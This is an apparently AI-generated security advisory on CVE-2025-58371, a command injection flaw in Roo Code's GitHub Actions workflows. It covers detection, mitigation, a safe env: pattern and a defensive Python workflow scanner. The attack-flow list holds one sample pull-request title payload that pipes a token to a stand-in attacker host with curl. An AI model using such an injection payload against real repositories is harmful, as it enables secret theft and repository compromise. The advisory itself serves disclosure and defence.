CVE-2025-58371 Overview
CVE-2025-58371 is a critical Command Injection vulnerability affecting Roo Code, an AI-powered autonomous coding agent that integrates into users' editors. The vulnerability exists in GitHub workflow configurations where unsanitized pull request metadata is used in a privileged context, enabling attackers to craft malicious input and achieve Remote Code Execution (RCE) on GitHub Actions runners.
Critical Impact
This vulnerability allows complete repository compromise through arbitrary command execution on GitHub Actions runners, including access to repository secrets, ability to modify code, and creation of malicious releases or packages.
Affected Products
- Roo Code versions 3.26.6 and below
- Roocode Roo Code (all platforms)
Discovery Timeline
- September 5, 2025 - CVE-2025-58371 published to NVD
- September 15, 2025 - Last updated in NVD database
Technical Details for CVE-2025-58371
Vulnerability Analysis
This vulnerability is classified as CWE-78 (OS Command Injection), representing a severe flaw in how Roo Code's GitHub workflow processes pull request metadata. The workflow runs with elevated permissions and has access to repository secrets, making it a high-value target for attackers.
The core issue lies in the improper sanitization of user-controlled input from pull request metadata before it is passed to shell commands within the GitHub Actions workflow. When a malicious actor submits a pull request with specially crafted metadata (such as a manipulated PR title, branch name, or commit message), the workflow processes this input without proper escaping or validation.
Since the vulnerable workflow operates in a privileged context with broad permissions, successful exploitation grants attackers the ability to execute arbitrary commands with the same privileges as the Actions runner. This network-accessible attack requires no authentication or user interaction, making it particularly dangerous.
Root Cause
The root cause is the use of unsanitized pull request metadata directly within shell command contexts in GitHub Actions workflows. GitHub workflows that interpolate user-controlled variables (such as ${{ github.event.pull_request.title }} or ${{ github.event.pull_request.head.ref }}) directly into run: steps without proper sanitization are vulnerable to command injection attacks.
Attack Vector
The attack is network-based and can be initiated by any user with the ability to create a pull request against the target repository. An attacker crafts a malicious pull request containing shell metacharacters or command sequences in the PR metadata fields. When the workflow triggers on the pull request event, it executes the attacker's injected commands.
The attack flow involves:
- Attacker identifies the vulnerable workflow configuration in the target repository
- Attacker creates a pull request with malicious payload embedded in metadata (e.g., PR title containing ; curl attacker.com/exfil?secret=$(cat $GITHUB_TOKEN) ;)
- The workflow triggers automatically on the PR event
- Unsanitized metadata is interpolated into shell commands
- Attacker's payload executes with workflow permissions, accessing secrets and repository resources
Detection Methods for CVE-2025-58371
Indicators of Compromise
- Unexpected or suspicious pull requests with unusual characters in titles, branch names, or commit messages
- GitHub Actions workflow logs showing unexpected command execution or network connections
- Unauthorized commits or releases appearing in repository history
- Evidence of secret exfiltration or unexpected API calls using repository tokens
- New or modified GitHub Actions workflows not matching expected configurations
Detection Strategies
- Review GitHub Actions audit logs for anomalous workflow executions triggered by external pull requests
- Implement GitHub repository rulesets to require approval before workflows run on PRs from first-time contributors
- Monitor for workflow runs that make unexpected outbound network connections
- Scan repository workflows for vulnerable patterns using static analysis tools like actionlint
Monitoring Recommendations
- Enable GitHub Advanced Security code scanning to detect vulnerable workflow patterns
- Configure alerts for workflow failures or unusual execution times
- Monitor repository webhook activity for signs of unauthorized automation
- Implement centralized logging for all GitHub Actions workflow executions in your organization
How to Mitigate CVE-2025-58371
Immediate Actions Required
- Upgrade Roo Code to version 3.26.7 or later immediately
- Audit existing GitHub Actions workflows for similar vulnerable patterns involving unsanitized input
- Review recent pull requests and workflow runs for potential exploitation attempts
- Rotate any secrets that may have been exposed through the vulnerable workflow
- Enable required approvals for workflow runs from external contributors
Patch Information
The vulnerability has been fixed in Roo Code version 3.26.7. The security patch is available through the linked GitHub commit. For detailed information about the vulnerability and remediation, refer to the GitHub Security Advisory GHSA-xr6r-vj48-29f6.
Workarounds
- Configure pull_request_target workflows to require explicit approval before running on external PRs
- Use environment variables with proper escaping instead of direct interpolation in run: steps
- Implement intermediate environment variable assignment to prevent direct injection in shell contexts
- Restrict workflow permissions using the permissions: key to follow the principle of least privilege
- Consider disabling the vulnerable workflow temporarily until the patch can be applied
# Example: Safe workflow configuration pattern (step fragment)
# Instead of: run: echo "${{ github.event.pull_request.title }}"
# Use environment variable assignment so the shell sees the title as data, not code:
env:
  PR_TITLE: ${{ github.event.pull_request.title }}
run: echo "$PR_TITLE"
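The following scanner is an added example for the root-cause pattern and the workarounds above; it is not Roo Code's code and not actionlint. It walks a workflow file line by line, flags any untrusted pull request expression (the field list is an illustrative assumption, not a complete inventory) that lands inside a run: step, and leaves the env: indirection unflagged. The two embedded workflows are constructed samples, not the affected Roo Code workflow, and it uses only the standard library so it runs offline.

```python
"""Line-oriented scanner for the CWE-78 pattern behind CVE-2025-58371:
a GitHub Actions `run:` step that interpolates an untrusted ${{ }}
expression taken from pull request metadata.
Added example, not Roo Code's own code and not actionlint."""
import re
import sys
from pathlib import Path

# Expression fields an outside contributor can set through a PR or issue.
# Illustrative list (assumption), not a complete inventory.
UNTRUSTED_FIELDS = (
    r"github\.event\.pull_request\.title",
    r"github\.event\.pull_request\.body",
    r"github\.event\.pull_request\.head\.ref",
    r"github\.event\.pull_request\.head\.label",
    r"github\.head_ref",
    r"github\.event\.issue\.title",
    r"github\.event\.issue\.body",
    r"github\.event\.comment\.body",
    r"github\.event\.head_commit\.message",
    r"github\.event\.commits\[\d*\]\.message",
)
EXPR_RE = re.compile(r"\$\{\{\s*(" + "|".join(UNTRUSTED_FIELDS) + r")\s*\}\}")
RUN_KEY_RE = re.compile(r"^\s*(?:-\s+)?run:(.*)$")


def _indent(line):
    return len(line) - len(line.lstrip(" "))


def scan_workflow(text):
    """Return [(line_no, field, stripped_line)] for every untrusted expression
    found inside a run: step. The same expression under env: is the safe
    indirection (the shell receives a variable, not substituted text) and is
    therefore not reported."""
    findings = []
    block_indent = None  # column of the run: key while inside its block scalar
    for line_no, line in enumerate(text.splitlines(), 1):
        if block_indent is not None:
            # A block scalar continues while lines are blank or deeper than the key.
            if line.strip() == "" or _indent(line) > block_indent:
                findings.extend(
                    (line_no, m.group(1), line.strip()) for m in EXPR_RE.finditer(line)
                )
                continue
            block_indent = None
        m = RUN_KEY_RE.match(line)
        if not m:
            continue
        value = m.group(1).strip()
        if value in ("|", ">", "|-", ">-", "|+", ">+"):
            block_indent = line.index("run:")  # multi-line script follows
        else:
            findings.extend(
                (line_no, f.group(1), line.strip()) for f in EXPR_RE.finditer(value)
            )
    return findings


# Constructed sample: direct interpolation into run: (the vulnerable pattern).
VULNERABLE_WORKFLOW = """\
name: pr-check
on: pull_request_target
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Announce PR
        run: echo "Checking PR ${{ github.event.pull_request.title }}"
      - name: Lint branch name
        run: |
          branch="${{ github.head_ref }}"
          echo "$branch" | grep -q '^feat/' || echo "not a feature branch"
"""

# Constructed sample: same steps hardened with env: indirection and least privilege.
HARDENED_WORKFLOW = """\
name: pr-check
on: pull_request_target
permissions:
  contents: read
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Announce PR
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "Checking PR $PR_TITLE"
      - name: Lint branch name
        env:
          BRANCH: ${{ github.head_ref }}
        run: |
          echo "$BRANCH" | grep -q '^feat/' || echo "not a feature branch"
"""

if __name__ == "__main__":
    paths = [Path(p) for p in sys.argv[1:]]
    texts = (
        {str(p): p.read_text() for p in paths}
        if paths
        else {"<vulnerable sample>": VULNERABLE_WORKFLOW, "<hardened sample>": HARDENED_WORKFLOW}
    )
    for name, text in texts.items():
        hits = scan_workflow(text)
        print(f"{name}: {len(hits)} finding(s)")
        for n, field, snippet in hits:
            print(f"  line {n}: {field} interpolated into run: -> {snippet}")
```

Run it with one or more workflow paths (for example the files under .github/workflows/) to list each line where an untrusted field reaches a shell; with no arguments it scans the two embedded samples and reports two findings for the vulnerable one and none for the hardened one. The scanner deliberately reports the run: block only, because the env: assignment is the fix the page recommends: GitHub substitutes the expression into the variable's value, and the shell then expands "$PR_TITLE" as a single string without interpreting metacharacters in it.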
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

